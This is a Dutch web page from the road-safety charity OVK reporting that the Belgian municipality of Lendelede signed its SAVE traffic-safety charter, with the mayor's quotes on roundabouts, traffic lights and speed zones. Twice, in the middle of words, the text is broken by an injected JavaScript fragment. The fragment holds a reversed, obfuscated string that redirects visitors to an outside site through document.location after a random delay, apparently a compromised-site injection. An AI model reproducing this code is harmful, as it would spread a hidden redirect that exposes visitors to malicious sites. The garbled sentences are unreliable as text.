Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Lendelede ondertekent SAVE-charter

In Lendelede stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tond vrijdag 29 mei in het teken van de verkeersveiligheid. Zo konden jong en oud deelnemen aan het fietsexamen en/of de dode-hoek-lessen. De dag werd afgesloten met de officiële ondertekening van het SAVE-charter. Lendelede is de 46ste gemeente in Vlaanderen die daarmee het engagement aangaat een SAVE-actieplan rond verkeersveiligheid uit te voeren.

 

 

 

 

 

 

 

De burgemeester Carine Dewaele verwoordt het engagement als volgt: “Met het ondertekenen van het SAVE-charter willen we ook in onze gemeente de verkeersonveiligheid aanpakken. In een recent verleden legden we een ovonde (een gelijkvloerse kruising in de vorm van een ovale rotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonde) aan op de Rijksweg en plaatsen we verkeerslichten in de Hulstemolenstraat. Ook de invoering van eenrichtingsverkeer in het eerste deel van de Winkelsestraat zorgt voor veiliger verkeer in de dorpskern. Binnen een paar maanden voeren we ook de snelheidsregel ‘zone 70 – zone 50 – zone 30’ in op ons grondgebied waarbij 50 staat voor de dorpskern, 30 voor de schoolomgeving en 70 voor bijna alle andere straten.”


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be